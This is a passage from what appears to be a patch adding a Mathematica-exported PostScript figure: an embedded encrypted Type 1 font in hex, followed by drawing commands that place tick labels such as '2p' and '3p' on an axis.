+35ED9BB38CF811E39CF8F154684E3D8B12E3B673152B82DD9B15A2A68A6163D2CCD72D3117F7C24C +F1575671832ECC4AC6B912882C0231050D60ACDC7D6F36C6BB4E32B6019B32D1DA08C7ACFC1DF451 +3A338FACC16D297C56C6138FB02FC7FB5BF7B9DE4C61B63C6B37B0F9CB42E6FF86693BAE1CEBB60C +9C15CB6222F547E0D0776BC5545A73A2ED3C7799F0CA3C2D5EE17849DFB15C6ECF7C2846AD10870A +00E0810F35A57770EEE9D49D05B54500DF164A02FFC324CCFDB5F828AF7307DDFBBE647E98909C73 +A3CC6BFB360042823C678EE6ACA0D658C12776F2A573656073E4F40505F5CB4A3D340B034B0FBC29 +C3B6B055D23F0BD47E44B441D430B8703883AF8EBA79081D528AF5646340A27291472B8E1F19C8BB +B4AD17C7EA1FCFCC7B52E6EBAE0BC8204AA52C08B3A63B2F07FBFF20092139143A24130191C41D2D +69077D71FC204C5FD41275DCEBEF7E5701BFF6C0A4217F6F60C2E37697C7F1C35D2451B040BA0D28 +0C9D23AAEF592BFFB436165C314C3CB75223D15694B6EF312CBCE8035A1A9172365FCCD119CD5DCC +569B84C6BBC5AC9CAB6942096034523671156FAE2012F6A24A001DCB2F35A8A031A2366CA98F1E52 +944B58FBF1852710CEE0116BD2C7D68DB956B15FB6AAA147155E9F179E67357F231F8252D728AF12 +49DAFCF6AB4EBC8637E1BA10D27555D2FAAC9EEE5E51C8BBC793ECC6011C4FEDDF7116E719147927 +0BC11D5EDD9215A4E8087A6A16A591BF7ADFDB69C4A03361C0DD078017DC5851BBF60E06A86C6C0B +E08087C99F4F9002ED5206534913353AE16C4F358BC1564A442CAE506A107D1FBC0B9ED99AFC6633 +209BEDBBB681CCE475645E92155285C00FD6985216CCE60064946F94778F7AA85ED87F5762C20FE9 +DC007954281BD6FCA8554D2A0CA5B76A3ED42EE5F44F3B276E574F64B20E1AD489753903ECD20B4B +EC88ABD1E1CF5D06AA1815AB771E350EB6D04078EC04616B977CDA8CE88C483DDEE9F28D58366D3C +224C41D19E550B5ECB9775F569C2D391F61C4667A9BD11C69A88473AA7884B823F762195CC403823 +690A32087893C29C63100A5935842F6B612C95EC9B5F07459608786310C8AE65DBBDCFED21B43191 +874E20D08F12E1384DCE1A990CA5F07DE36BD012DC9EC558FE7CC44494F48CA3BCBF1F1F11BB98BA +EBBF8691F8590F84AD849923E656860EFC0EC27496FE6D6C185791E3261027DEEE4C57032547F94E +7D593F7885526AAF054BB850C02E863D831ECFEE61A781B89867139889A362F95F48A837ADB955C9 +939F609D2EBBD56775151D2EA4B09D38FC1D824A952EE7E52849260DE61F07333076CF887A3AC2F4 +CD088C29E47715C5242E2366CB493B2FEB38C19FC159EC50EAE88409CF0A30C0A6823C45D0532C2A +72E45A17916F6CEEB475C4D4A19372AE271326697CCCAFBB43D92C25A052797186FE8314FB41FD94 +2A4B24548866BAC19A83BCD2E6979FB3C7B70B075DCDAB3EF6B6181A00A98AE73B6D968EE2DDEF07 +503A92E4FE1E0B67A90A2F351D600DF960101A15808AA99B3C680A8F50D5CBBC96D98A3A2AD5F14C +43857F4CB9DF9372FE74B5D6CA9CD801667399E778B56EF702A56F0F393137B20BF11BCFF9DFC0F0 +4E67649D07A2A5F4C42C9A929231D5BACFB6B53210E9FE311642D8BAA7358E6A7370B6CE921765B3 +68A354B42C8877E59227146409DA83E407657BEB475329F228CDFDD11BC73123234649AEF0E2E9DA +76C12AF91713828368FB778905A6B7150258695D4D9DF6111E1B28A9462002D7C476FE44A9B13F32 +9FF84930D213787932A1BA01EA608ABE7054FFDAAE2176EB960005E5407D7C1D39AEF8EAD8683A50 +D93398C584312EE4A12C07E9D55AE9981D7EF57D66499CA93EA653EDDA1BECB494662E54CD7ED8A3 +0B2A8522CAB12B2751F7E9B3B66CA0B5C8905E0F3A51F68C96E9C02F10FE515FD6133D3ED298D15E +8B1649F3D13341BDADDA7FCB838720E8D0D9DD92D0A241A0CD8E25D7B313DDAA2F25B543BB0E7965 +402ED0F24AD146E49919ABD9604ECFEA5A7A49E58664DCEFDC893F5D722CF24A44D26369F5D86569 +9632141348086A80AE528EDAFFF9D9986D5665DBCD375DF221D5EF1757D79361E5A5BCBE333B6C9C +1CF46794A7C7C776477023BB298C970F6DFF9AE6C7ADDA8CEBE73B07117BFED6CED2A36548081C79 +BDA9A70C8FC5FA16D0EFD3E9F869DD5DBDF6E70CDA4217935FEFE577B64DA1DDBADB9A092B9D1E3C +E1FD3B6E0117DDED155313A5DB7D8742C3409FC18B9743F09ADEC49BFF2FDBBEF9D5FA7110266287 +7C65E3A1421BA56E258A49D76C436C97AE2116F772CA5EEA5726BF17AD5D5CE37DC5F45235730E90 +A1A1E3087132C820EB9E0E311500F2CA193C72E2ACCB4D77ADFA34E268B014FFAB5DD1BE7187251A +A69B7BB3A517796BACEFB9ACE0114FAAEFB0D9BCA028A52F5037291232A04C2353B9663BFCBEC2D9 +30CB007954B8C6396003214262AA9CA9FA876B4191313FD1831D664863C4A19946AEB8F4E21C468B +9C94B8CAA407A74AF418DFB60D46BEE5029C884950D3BE8A58023DA864E9AB34005337D335B0B35A +91DDEB53A54C3233150E27225B0800C841E489E9EA6C12F5D95112BB723C3E88AAEDA3A942D06242 +2CD80B04DDF024ED79224E166086C5770EB10C389D0BF0327B2F753358D9BD552C04EA52BA154EEE +5A84C51FBBFC79055AD0F1243E489F82FD3D1A3D2CCB24A02DB3F306767564A2451DA405BAFFED98 +20241A82C6F4F6E1D2A36FD954540EF3C091247120F5E1B362D1EBCBF80951A3158B1547E7A0CCFE +40C03F992BAD00496C32BBE9B0A06EE9554EA3FAA247A7399A37D05329CADB006F679B58F2E5969B +13A5516A9F6949505A64B7B3FE5E748B9B9662C05E6C5CB79D64FD72C54F557ADE72880B3F9D8718 +58D5EA3FEF2BD3FCFD670794AEA6144D13782BA89648C98E7CF5160089DB9798E49BE2DEBC2669C1 +0C42AE1AD7C1FF4921EF465300977E057C0AEE61579460F56E51B6EAFC1F7F41D669ADE9610EE777 +055F927444F971121CD76A55A273CEBB481B89D6B78D0066ECE31BE3EEF65CE9FD22D22EFD6E3ED4 +536E6439782AD53550CEF1A903125F228A3E2F1AA3342B0551C59924149358F8E941969125F6E54C +8B2C068F57FE0DF91912CD71BE9492768191F4F6B70BA45C72409D4AC6E9619E8A34398E6A66E984 +55F1793D8A2C0DF30EABE2B19679318AE09014262DFBB9AED5D637653FBA1C10821908ED6E088910 +AA033E2E0798A630966D29F84845A9C937C27A268CAB8BA1AE9B32E12B52EE4B64BE5388AD32035C +7F98904F052B31D7C4819E27BCBC597E8503A5614E0DC2BBE5C51922980E3F492B61BEEB169C3EB6 +AB9F1DA82EA6BCFBCC16199923C8399B0495EE9A9E1749DAD9FB289FF3FCCF34F55DF7D94F91EF31 +B3B4C8074C567C4FAB337A337BCC2F459075244F665B079C159AAB83781E465F5259D41313183EC5 +F5F53BFB4797942F93EAD6CBF9255F9B4DD0748A3BC6BF36ACBE0127AF68EA6566B65430D0595FD2 +A7A2FF74055BF2E70BFFF2B79131F1871CEDEFB495FF914B88770654F9E5556AF535E1B9AF812004 +99288AA39D1388ACCB5B11B13596B550F2746B2A83B076F4F606F7580156E54FBF6976AA4CFC9581 +0A7FAC41A1635FDCFD6F7CD6BF738190D7F9FEAAB8C0B7CE38DD1459E2465C3B75625C8BAFE3B60A +F66ED183965AB9681A8174C44311D8EE36E468A8FFE2035B7C5AB6A372FE37FF627F4697C0D19F7C +8A1E356F829BBF2B8F4A95A49F85CA16ADDCA5C0817D6A4F7C4EAEE908DA13E0C89C9AEFF6D1D7B5 +BCD1BBF672B46C4960720CD1C74E70C78784CBFA8930576AD4067D406A0FCE9248DCE6D610D7EF0E +97F3F9CEA1D08DDA90DFF0C484DD32265FD13A2571513F361DE3061F2EA76886112AC7589B290220 +E34610277CF81535CD628CA688CA812275D7B9909757DD519F1FC89FE4D0AFE5FDB999323A470C6A +A0D9BA9CC92BAC24514E7CB3A3EAD2A70271EA8B02B2DDFEC6CE803F1B761D9BB7099FFCBF918D8E +B602946FB0DC14F0FD1289037B15A4A96A4605BBE53BCEA9112BF9746F3BDDC06CCCD808C62F2B41 +D4F508EEFB03AD22E2E154888DC63C6BEC6A21D1851A5C82397FA49BD163BA8A72527827E4B6F50F +585325219FAA9B3A2CE14A0134C19DAE50373A0F9E6DDC8205467242D11A3989D17730C8169964B9 +CC9549BE20A84FD9137DD9C9F7DEBAC3A41345DFEB0AEDCD7ED408A909000FE8D9CAC85D93052256 +7A2C9312769DC85F902D4A5F5766EA3C561549F1F2B4C5269276946809ECA26B6F51DB4CBDA9E668 +BE1023D8962C0DBCACD5BBC9E5F61C459B825036E1322737C0F196C0DF93DA76011DF2CA06F7B383 +8C672A802EA24A474ACF7A51F2DE867ECAF5674B1053CD5419F5FAC20584A3F7565D7CE584CD395B +1968B622FE3C68DAD2F0E33274DFDF03B5A8EA047B077DA1316DF487C91ECEA84E9B417EA25EC9CF +1F1CEDD7A1C2CB0D51A58BD8F9772FAED8D553141ADAB148AFDA200479CD04C0FFD1478EBC618303 +5437A5BC1AEE3218E9B27D21656EB9F31BD4E7D3186C89DF251207E8B67265585083111BC1AFD4D6 +A2773629147A29CBB4BBC3935B83392487858E0D18FFC96E57C83C4C6744C8E0DBF001DFD64B660C +CC8064907AA4BECC12376A1EB55EDF655CBBB4744C1A6166590B9572073A2AB577EF446B80567241 +389F990AE6C90B286EB48454166BBF264422FF2A387FA0B413F2295B6B188A64927DF702C232CCAE +59A2CCD1D109840A464BAC74A45B865A6667C901D86F771C4A36421308551F532497990BC15DA648 +6E322566C210C517DAADDBC24DACB39CA41611B9F961E4696D1FEC46E71C608DFDEEF19ECDD88724 +24E1BEF7176B0AFA4888BDB4C56C8690AFD03428F32740DFBC4BE22B7583DC47BBA42DF4E83C14AA +29F4E79397BBDCD2EC43338BA1F0D2CA9DA6E64A065FCB0073ACD0D86E46EEBF1454C9C172C6BAA5 +0F37FA19756B05405763387237794E9FF74E6749BF6CE5EE9145413950D342DBE5B0EFDE57163127 +2A8D060E935547E1FB0FB1FD60400FF856D027671CCAECFF7E215BE61E8A77E9BF5C72C2C1E4501A +A11B2F8574BD823574EC9598D579A9C5C525867F4BAAAA78DDA0E5BD7AC832DEA41328A507874A85 +90B7F133E743471D4FA27DFAC39C6F99E233C913183B2A039CBEB5CB3BF8825A92D83D266246D5B3 +CC7B11469E611E260C6ED16D17C9693B13B78E3F0DE2F0ABBE73FD6AE1ED25F57B4894254FFDB332 +0E65ADA53669B95CA28BB4BD166507E9D8F12727E46D2B9593186C090764FE8A95F1594291FD551C +A96E4CBE1D6FD42852B2B65E7F10C4F17707F930DD934E2A2ACBDFA40E04EABC1E54632D67AB7D5C +00DC103A3D11DCF78B6771D98ABD5CCA0B253283C67B0863C80D1A78FE6D5422568207509FDB1946 +92706C7A211B29955F6354092C9732DB2ABA8CDAF407FF25B40BF9D73317D5985E19E6C12B6AB5F5 +DD59328905F822E1EBEB87C4E386EF20CEB7EAF842700F09BDC50D7AE6442D1C93804D56FE194785 +968373A154E1F426BF76692CE3E4474360ACB9FEBD3191B8EE909E7C224EF90EEF36CD660AC9A642 +4DB5BB20B8835D365D35A442ECB2444F30466C3323001A087639B73848E3EE275406CFFB495ECDB4 +52F2A357F45D2D32BB22CAF9F9C2C44741A5341B29BB6C4322287A2A3891E1E853B976E17DD9306F +D98BDE8A0C97ABDCC7C708BD1BF49B524CD0DCECB40DDC557E9C90A1EDDEE57BBABC4C338F08A625 +E03C1C1A20DEA709051EB1A3264D7002D6DD2BB7B622AF93C7DF54F49EFA5FBA58F115A049A91875 +A2476C19F9133D0BE1B07C8102746163CEA0A98F9B62EA59C9CED7AD808DD52DDF8687933AE52A7D +9D7081150A812801D3FA78F90C4933E5DF09C991325324DEC6ED364ADF73DFC7B78953B51FBA2F81 +F264C2A94139289CEBF7ECD6D8FEE9E579BE231FE1ABBCC07B4BF1884CABDCEBFC56610A5E2B7510 +37FE804511FB5443F7B21290E38855F6DE5EE38960E02481DC57F83CFCB87C8FF1CB196CDC19B2B4 +6C7C72B64D7D45C678851ED7E2860DE7DB772BE7B33C84ADF7E6F9B2063D1263CDF55E6220753ACD +67C4701EBDC0799AF47AC58A0CCE796384A50DE6A814DD994B372630E64E5FDFF57393522F689DF7 +81C44599B21AB1C214D4ACF94F07CFEE79C628C85378B96D9007ACD4225E14DAD8C70984DC596DF1 +96BC814E7346217C94F172FA40B3DFC73C30E6E530DDE4A91F6A5166AE19EAA3D2CC3D9D6917BFD3 +1EFAC19C236463AF8D7FB7D9B3A4D6FB6D962C59B296E988561957A3C3D11F33ACF69F5768A2DA30 +462BA9AFE67D3C41A1E8368099361F50D4F6368963A48C75F1590804E7918A02EB9DA5F60F49828C +95AC60E9D86DEB7699C35037669C02D408269D6BF481EC745E4EC630F68FF5168BE5E0BDF875EEC1 +5EB9CAA9CBED1CE2A0EB4CE97C14E10114087DCBE5DE1DB6A070CBC6B68EE141B7D62ED320F7B74C +07D9762E0F5C8AF0779D38B7677ED65B5DD2F83ED06F041B5701228EFEAA0FFC031E44D6D68B274A +45FF9EB62FDA007CDC98B86831E9A668098364B421E1FE2A45D85824612A521777C6177316F0C6DB +D9847A2F61326E74A3114EAC3ABAEE456156DF125E4EDAD6BDB66E7DA6370C90ADC4AF4EC1958170 +C32D5AAF3B45BF749EE1DFAD8A5D0C03973B7C1589EAE4E67F6C87213C721E4A33466F3F54253545 +5014417CFFC9AF461CF695F5E1D7A37E4C7680A5624AA11EEA65C59BB38A96734E4A4A238C636638 +9EB8083D5AD753FA7F74EDF10054315EDD53DE61D48846F70AA9272626E23BA3DAB7CCEE819B0A88 +9CE775AA7F5205C95A19AAF475729D2C0BCAD9AB5459380A5F034C108A64B80621820D779582A198 +14058DFDCC6C2D6461AC6F98C64AABA53A2EF77CEF612EA766FE15498F56F54106D70D0F8DD4134C +8C64B282E79A96F15D4BBE0297885ACF775BA5009006315637D60AD86D25A3CA6AC5BF5B4DB95B1A +672A8C589D89101809D838236560F7690E329784C1D335203BFED3A258CD79467D16B6DA06A282BC +4B9669986CB50C54DADE3D5B20FD5CD9FDDE60AF4B5D8D9C50E77CF50DF3B36F37F381FE7E28A719 +91C8199D18258C09BD0440F5E258A5D2E22C6CFBFDC5F91228992E86532F4C0A50067BCB2D4387B2 +9FEFB8043D7BC44A322FD3629D7D92B6EEBA21B035DAC884110BDC6B22CF59B08C195BBA1C682E5F +8CF32F479937D329FE8EC6E9A3A3AA63AE95EEB766E0EACEEAD4DCF46617888AE687009112732A7A +8FA8419A4652075EDDF83E291613B66BA793D3858CEA093C79B89B0C93E11CAAB86AD1980C401713 +0B6A02545DE484FDA6E4DFBCEBBC848751B2A8821CB3F7AC96D2EA9B83B575AB60CECA41EA567EE0 +8ADAC8F1060255057527485D6B12A26D2E7EF6892865FD65FEF28F8B46249C4F19341089D59DAF82 +582CAD1A3B53C763A0E57134A57C4A24AB4FD358592ADB01BE8F1D9FAE9CA97A3BC3A0E2939913E0 +62960CC1D29ECEF9E61BAC20E92F13C49078E7F1562C9D7C01C2B300ECD6ADCAC9AA0C1F1BA30401 +0573F79D158C66D91A8D987C5239C9D4FEED1DC5C9586C4129C33E7C737C624EE9BD1EDE38E9F72A +78DC19E144B5AABF3B0FB72216815E371A5D6452684965CB7208B87CE5A27E444820E03F80AD2DF4 +E280D25D9BDE41E719BB2C939E25B7965DB162CA8665CBFE65DFDC7992A508D54FE4EE8454C11482 +7186A280D3D9EDF397640A809E3646675AB6621B9CDF42808E2F19859AC975CF70F41D2B3D22F8E0 +C180126F4A12122B207A150BC8E1819962DAEBB821DE59B7EEF8FF9219474597AF859E353B4B713F +5F1350F4049DCE99627492E396038B10A2F8E82AB679F65BE14A166E4502921BA44CCFE04E5DD3FE +B04BA47C3F7A3E7DBF7D55328AD1E96092C73EDB16C3325537295DF768E2633D01304EA0B01379AA +DAFE6CCA2AB3E246768C5AC841A458A2F69141A9A9D716D129B26643F1BBC95D8CD0ED44148F7C6A +F370201E454F4AFF7C11A8080508FEDE242343E7ADDD5A8AAF079C50765A79BD25FBBDC59EDF980F +FE0B60435692C49D20AC22F8BD1FCA3F3D8200CA26D61A30212558B54671E63BC09776A3AE7A906F +CA63281F080A00500C42C02B8F82357A3EBF572CFC4BEBA3FE86537DDDF23A861C240A31778A131E +F638C1DBB7E87A45487C092D23FD9FB2C162C3253636ED263B141178FCA9F2D5BE2D81F99B2872C4 +B3C08749CE18C9C00E75DA6B3E4C6A6DD79EBA731618EF5B5E767BB40429D8FEEC6ABFE9975746FB +3A82A03A07B7D0DA8BAECFD1F72AFE17EB0C0CF100A2D48F4449A42C482BB1D64C19F8FEA73F5BA1 +8FC9BFEE3F640C39C081669A9B0EE3FF6B2BDC0A726301EF0E2259E65BE59275C76E7A3F1C76C3A3 +3AD0E2F79198DCA39C482B4E1196238DBA937692CF319436830BBF441C0A8A04161DC0814B5DF049 +83099439EF421B6D37D351D4A988A8DFE93D796B2E8B2564C602F79E6162F56F933196A0DCE91051 +600BAFFD9D439A91F17C20CD6A9104B553D823A0317E3C8344E9F0B2560AD583BF876AE307892500 +2177AF61BDBD745CEC2B2A7931D27423D2667584AE0D6CAA2B281EB9271ADE86C493791AC9A2265B +8324F764D20DE65F6267439F1574DB02C600E771D3C743D420FA6F8BF01A977B91AF035E0D5412AB +0B85D6ED3ED9D0345ED434F9B95FD911A9D3828CD162686E6ECCD2B6A5B1104F0E6838AAC7FB3FC7 +09F08F8E82B4BFCB55D8984771F9F4D339EE7FF391448C7807A436A78B6A487D3A5A86F314B302FA +C5BE1C1DB9844F975619D615D1C7A20EC2B144797E0648CF5C044C8DD1699EEA3AC9D7E3BAA54A85 +11A932623D5ED3F0A9C3028CA439AC395F58DEAF1C0354A169D9AC7F380900D9828C3ECBB975F6FE +6BD79EA4BEA9B71F3A9B1D2EAF8F1E475B4FB99758192EBCDA21B47EA33F57C58E904DA260C801AE +CF457C84592B81CFA96C10E448D705D24871F3D1AD1FE004406C8070A54FA3747788C5B55E9462E6 +F51378BF3F848360542CAD2D5FF9EDAC84C164DFEC115A2F3D873760EAE58CC8F361B37E6CE076EF +325A1C54DFF84DB95DB7DB5B56C48ED15C5426E6153D8A94B1A35B22EAB1D7B871097DF12C093BA5 +538957AB7D0AB2E39A2D1AECB91F0A693B8F6A00601929B6C55AAE8A227CAB6404FEBCC8BC4EEEE0 +ADD4CFD7DEC225170A0063457918B9875AD7F022A8F9932ADE316E4126EAB75C1D0B2B9F44E85F1C +54755D1301345665EA630C8E885A8D9AB069DEA2CC6D12E4A0BF6E80C3AE12BC7ABE507422A5D92B +65F70B4A472DD945EBB960880EC4C34E4C206C260FDF86A997D7D399A0219A51E6F8BC1189EC0ED0 +B8686F0243BFAFD829979747442AB1DA8282F10F4C37C4E6C88D231460DA3BF34C23A4755E2F8F21 +F6D138C86B6091CB3BCE5ED170242C4CC87C010FE63DA9A2ECBDD85311DA8572AD67E40F744D2EC9 +6607701D9790574F051C859EF29291AFA301C809E0A5513DF9A7FC2DB1776DBD4A2CB622BD17811B +C0E584A8D89D4BEB17C2D0AA8BF31CD7E2B36C0E1888409788E30EAC2E46AFA1CFE457D3A19C28C5 +80669CB82CF36BF40DFAFED78F99A5D5DF189CE293413FFBA9E8D2457986C68483242AD767D5F026 +1CE303153C35D5DEB1789448088B51C48A9B8E903BBC69ED7FB0129CCE33A0337198F11DBA94FDAE +AD74BBC5E519F559094E15B03AF3EFA89DC38B4278C68D2AEEEBE4B28B351D7B72F52D94480D8CBC +06544645F20800B8284A4E7C8FAD59D0AA8EC8EC0551912CBC62694A5DD15C469BBE614FB187C084 +838D676E5A1CC8DFA8676758EB7D53FD2BA8F1C434F4F70AED8F2CE27EED2F6A82E20E30EACF9BF0 +CE28B4BF7D556815A887D777B7D75F60D2C410AA2D378B7BFAA6C3A5BF0A5EF80D3E35A0CF393A5E +BC27A895D712C6F004F1A03F9FCF493973F33E6FB106407DFD992AB0E9E36EF395663A6EEFFD71BB +2DAD9DFE6AA4685F307B8FD69BB2F74E672666414A71FA479B37D3DEF6AEAF80FA14821C65F7ABBE +5CC6DD49002216E23B3D22C282F3DE0077EA81017E79D8C3BDB61EC031CFB13FA981120A6C518F4B +4C39C9DD5AC6EDA29ABA527C9948BC3162EF65E8251C9D4E3494C6A51A41D489F8BC89250128EBD7 +0EFD01B9F03C40B6E0384364F2571F7D969016A959E4243D7AB728F0F030B8E2FB456D8E47A85898 +313B0E91C68C7A8A7226603427AC6DCB5C69924FD026E90CB0EE89AC42D874BB15AFC981079E9DC7 +1271C3E461265AF327D4AAB4AEFAB6A9DC3F84DCE7C7868D4719006344B9055C8BA952A2250B8041 +E5EF519BB788201124BE90AECAC2293A310D9565E1EA4AEB99F7ED7106649169E8EBF3DCB210706A +F2FA65158D3059DFBD7AB5B00DBB06B016F73FEDB3AE1C1CC03BC2D94B143BFBD759338EB181B1F6 +841F7B539D8D126FC5B31B244A3A00ABBB121A98F73314D1F1683F513C3CCC9A0C2180824ACE5D45 +E454062CE1217F7AFBDC60A6022B0134EDA6C5D787DE8A5925BEB374F64D612329B9AC17B6EC03F8 +56CFEE502C1FC3AAC7B6F251E8DE4147DCB1580185C406F38E6B729307EADFF6D7A0E824C9830093 +F0C4FECEEFC7FF839306FEFEB780FFBD8879F22AFDADCA4C0767B8EEAE5DB869D7BD91355F0255E1 +CAC68A81A276967F233624DE0D2082B89E2C2D1DB0F8BE0B2BD7051C4DE9B1564AA6CBA03E50386F +D685943D1EDDF5BE0EB34418C48E5EA645CBA552A0444B254E82E9E84A5B7BD0064D5EA87B1716C1 +4EF7FD14E2187FCE16FF6ECBC0A6588B30B4329626F024BDBA65457028668BC6750A4DD668D017CC +EF35CD9CF45EC73885FC91B8AD78920919B4747A710D25BB850B558C5CCF7170C20012DD0F2874A6 +699DF53EDC6C75716A5B6B06C98F4904BAD22B18C77B3EEF32DE3F45A8AC12383DA16DF6F06CD923 +D344CFC2253ECF97A52F2DC6A22539231E29A324F851265BA82BE566E42167247CEBD914EBE42EAB +E189E74FE1FF17ADA8A5F47DC9866CF86694DEE28EED333B0A8AE380557820E3F1D32B05AE27FFE1 +68267FADD310C4EE550F71704EF71F4C669952F30E485AF37561884066C0E3425C748BBAC77CC7A9 +87EC336B8BEBA44358BEA4ECFEA32494A8006E9852C4BFCB1C0F00ACC247F1F8E3F3B34539C67638 +64527F9F885132DCACBFCB1DC80EE3B2A711145DDA1D3B5F83144E2CD698D43A02B0DEB706C78D75 +A24FA39B9374E1155969FAD7D5FB477F4C3C7440DBFE1BD1DC877360E8690A6D3A64EF0A1313A520 +C49320295302227CE5625E134EA442A537505D206EE46E7E218BDA38F7B6BA124ACA0E949725CEEB +961EF8B0727E3A78287E61E65A84AC14D1014A213259A48F04C634C1F04C73B4110D0DB491250CCD +7DAE323CC8BD29BEF605DD92AA5480009DEAD1256E5C9FFB18362D63B022C2A378D15ADE2C6AE603 +1DF385CF090226F0AF889464584A9EA63B884453DE231058C5661C4F7DCF7505D7B1E48C78AA5799 +8FF39084FFF1CD18CB2989D867F2E085B291FE52367B4E8667E5CDA4F41DDBC7129DA5BDC39549E0 +8B67D9C9E4C332D91FE261728521245CBF51870F24C42F5814F393719A9E126C5693C0E776E4D8F3 +0F0288537B8E9A7C5DA4F931FC83F96A1950B1DF26C0448B646D3BF42C0429E2BD0164703FC71833 +19DDEA75CE65D9DFFE8369787FE664306D843421C2C0C3A5B210E823F8366161A96CA88D95FD6486 +5F9E5B0D53DCEE4A98AC10A8FF1BC34A46DB6016E973C9FA298D3F58228E3D9FCCCF9632556CE2E7 +F9C81E05FDB0FC1071E69A4C158E742D0B8939CA3DE33A4BE8D01D679C81C6BA9CF396A6768CA626 +05D796AA5C323E3A6208F2DA5000FC4462ED81AD0044D9959E40E4764562ADA76E33EC63271966F1 +7A13AD376A54FFA40FA247896A22C1C4A4CE51094CA1892A0B9904EB762839AAE1EDB5A0A5A69343 +CCA45F88F61926B23E6C85688862B1D10F1ED827FCCE2A427E49D960DBEE0D39EDE08D2565C6F5AD +66CA83DAC1467C38F742132F715DA7E9757A5D067FDB4A8859D148473F302BF6ECB9B7EA5C0DF851 +8F58D4D076625B92BC8201028064950D70CD40492DA83B98FFD79BD3DCD9CEE95178B6DEA9AB10B3 +4C61A74B49C3697CF714F56A9B1E366B04500C9A67704AF6F721851EA4566B96E220E7B526873F94 +E6013EA8C489639D291167BCAEFB661C96C27DC7BCD5B317C1F101CD8DF2FB29F6162B5ECE903C0D +5570C8C6325F05218850E4A5B5F94C7CE334BADDFC5DB98EF5333B4A92129F41D046D0F5EB6F342C +F362BC8E45511FCF328E2CE2D4C579516307AEC400BA207071C887F5185AF536A6827307D7698095 +E8A6F8C19812A11C32AD207FBC353172C8DF626C5C05CD24C171B3C8DAB270A74AC48E35F0A8849C +E0934B93D56C93599F5235EC441B5232257C4C6767C7B5A35830010E60E56AFBE9199B42E725A216 +C49D45A3C554767DF192F04D1A192D5CE196831EB7A56201A4A96CD44DD084729774334F698E1902 +614405347A37A4C753C0211D7F24D5265CF033E3C4D30E61886CF781D2AC30385E6021A892AB116D +1F5505635BF5C915D0300ACA8AC32CAA0F3639550C4AEB390DA7B86E53B6BB0E4819626757BA9986 +BCA4B4B18F6BF3706577A3BE146F2585025D5A36EB14E587C5469EEEB622D31FD32EBFA812B9CCDC +CFF7D17D00D9F21BF8871661F20E89A25A4543068EC509D0DF7DEA2A24FF68957943BE0FC7BD319D +92A575E12E6FB8112D72A100FEF3EE85972304BBE07FC1026CCC068E8A414F641116E51F76009C5A +F9E664BCCF93C943CFF2115235BB3290F935AA3FAB4F2E73FCDB9FA5E1866EFE278FFE7EA9DD6F89 +38CD5E5F4F31F6C659AF7EFF5B291AFB86521678B42C99275024EDAD04E5929D201A36F4A6C4DCD7 +2E349D6B9A1F90B123DEDE3DA50EDF929F9285747CD504C8F4A73D522F312D623BD65A35419C0729 +30976129B2D99B32D1DEDD81D64F7879CEDDFF04BBBF1286E07BCE651E2DEC190DFB9D25F3C1EEC8 +D7277752BB7CCC313A0FEEBF0EFFA2A189861AD4EA13AD4FDBD5160DC273F12525815F0D693C1413 +AFE4FBE09BCBD71E16C33E6CF8D18732447FFDCC2E4AF9E270D725C1D262D96E72538CA3309BCAF2 +35A3FAFAB27D265C583E6F6F062B555C97DFD89AC46E6154670ADCA13FD99F7A4B9B8BB224D43764 +8CC9DB76E177F562862C912D8CBC248A4C628FF2D0C9688611CED3DFB89064B988F16655633B7CC7 +AFAE34B2937528EA0814ED245D6B0D2AEF87A5B63E2BD7E4F7D9CFE372C295A0891F97C3855C97EC +C03C7C2A231704BED419612255F8B2C9262D48CB4FB46D63CC9697A210FA9D7BFC3BAB7E46172D3F +52A4AF9C4114BC72A5C7CBA042FA633AFD5E404F29408D4485837E55E6F9702F04C7AB410C351039 +6A78C8672F8EAD53BB9CBCED63FB9E72E7238CC88FB4E7C48C3DE3E4B80E277B952727916A4127A2 +5CC1413C390F4DAFD5253B07BC96DAE8CF4DA08330DEE580CBC1E12B75A661819E96B018D47A8B71 +B6BFAFC5E3CBFE68E5193417B6E730E6A2820838D22049BE6BB64B74AA13779D46519965ED80D5FC +30B0A6F73D26DEBD8150B3D27B3F135F608D59BB1632AD9C2E11177FAF54CBD1C4E58D58C395BAE8 +AD7C7AEEB0E1C3F0C0B7A5E7142E9A1DCCC8B4EF56C319D4A4F750857D2FD180F871772B9CC69FB9 +B222F83C3ACCB66125AF6848B2EFDCE3D2284FA5844641FB32F701FBF32F1D2F2E2233B66E36CCD1 +49FCB3FCDB6EA04367D11624717D73D9128EA7D9AABB8658BE9E9986E532 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +cleartomark{restore}if + +%%EndFont +%%EndResource +11.52 /Mathematica1 Msf +0.75 10.5 m +(p) N +P +[1 0 0 1 -61.69 -151.566 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +70.6 105.842 m +73.497 105.842 L +s +P +p +np 52 98 m +52 113 L +69 113 L +69 98 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 53.44 99.467 ] concat +1 w +[ ] 0 setdash +p +np -2.44 -2.467 m +-2.44 14.533 L +16.56 14.533 L +16.56 -2.467 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(2) N +11.52 /Mathematica1 Msf +9 10.5 m +(p) N +P +[1 0 0 1 -53.44 -99.467 ] concat +1 w +[ ] 0 setdash +P +P +[ ] 0 setdash +p +0 setlinecap +70.6 53.742 m +73.497 53.742 L +s +P +p +np 52 46 m +52 61 L +69 61 L +69 46 L +cp +clip np +p +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 53.44 47.367 ] concat +1 w +[ ] 0 setdash +p +np -2.44 -2.367 m +-2.44 14.633 L +16.56 14.633 L +16.56 -2.367 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +11.52 /Times-Roman-MISO Msf +0 10.5 m +(3) N +11.52 /Mathematica1 Msf +9 10.5 m +(p) N +P +[1 0 0 1 -53.44 -47.367 ] concat +1 w +[ ] 